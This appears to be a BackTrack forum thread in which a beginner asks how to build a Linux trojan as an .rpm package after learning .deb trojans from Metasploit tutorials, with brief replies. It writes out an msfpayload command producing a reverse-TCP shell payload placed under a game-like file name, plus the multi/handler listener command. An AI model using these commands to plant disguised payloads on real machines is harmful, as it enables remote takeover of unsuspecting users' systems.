Paste the output of your commands and their return values, and maybe someone can help.
Hi all!
I'm looking for your help! I've followed this website lessons about metapsloit : Metasploit Unleashed - Mastering the Framework.
I've learnt how to make a linux trojan but only under ubuntu with .deb packages... i'ld to try it with .rpm but i really have no idea how to do it!
Could you help me and give me some advices? I tried to convert .deb in .rpm with alien but it doesn't work...
Thanks for your help!
Cheers
Paste the output of your commands and their return values, and maybe someone can help.
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
I created a payload:
I jsute want to try if when i excecute this payload on a linux machine it works.Code:./msfpayload linux/x86/shell/reverse_tcp LHOST=X.X.X.X LPORT=443 X > /tmp/evil/work/usr/games/babla
So i set up the Metasploit multi/handler to receive the incoming connection:
How can i execute my payload? I tried ./babla but it doesn't work...Code:./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=X.X.X.X LPORT=443 E
Sorry I'm really a big beginner :s
If you could expand on "it doesn't work" maybe we could help.
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Could you give us some details here ? Like are you using VirtualBox or VMware or in LAN, the target's firewall, etc. ?
Back|track giving machine guns to monkeys since 2007 !
Do not read the Wiki, most your questions will not be answered there !
Do not take a look at the: Forum Rules !
I saw the lupin had already given a hint in another place, then follows reference for you too!
http://www.backtrack-linux.org/forum...msfencode.html
![]()
(gdb) disass m(y_br)ain
®
if u are in ubuntu are u try to make ure trojan executable u say u do ./blabla but this ./blabla is executable ?
check right clic and permissions![]()